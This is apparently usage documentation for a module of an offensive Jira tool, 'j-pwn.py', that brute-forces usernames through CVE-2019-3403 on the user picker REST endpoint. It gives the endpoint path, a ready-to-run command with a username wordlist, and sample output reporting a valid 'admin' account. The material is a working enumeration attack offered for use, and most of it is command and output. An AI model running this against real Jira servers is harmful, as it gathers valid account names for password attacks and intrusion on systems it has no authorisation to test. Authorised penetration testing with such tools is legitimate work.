CVE-2019-3403 Brute Force

This threaded module guesses usernames against the url below via CVE-2019-3403

module name: cve_2019_3403_brute

url: /rest/api/2/user/picker?query={username}

python3 j-pwn.py --single http://JIRASERVER --module cve_2019_3403_brute --dict ../usernames/first.last100.txt

        
[INFO] Running module cve_2019_3403_brute with dictionary ../usernames/first.last100.txt
INFO: Total usernames to check: 101
+ Valid username found: admin | URL: JIRASERVER/rest/api/2/user/picker?query=admin

+ Vulnerabilities Found:
+ [Username Enumeration] Valid username found: admin

Notes:

• The module prints some status so you can see what's happening
• You can set verbose = True in the module code if you want to see each request being made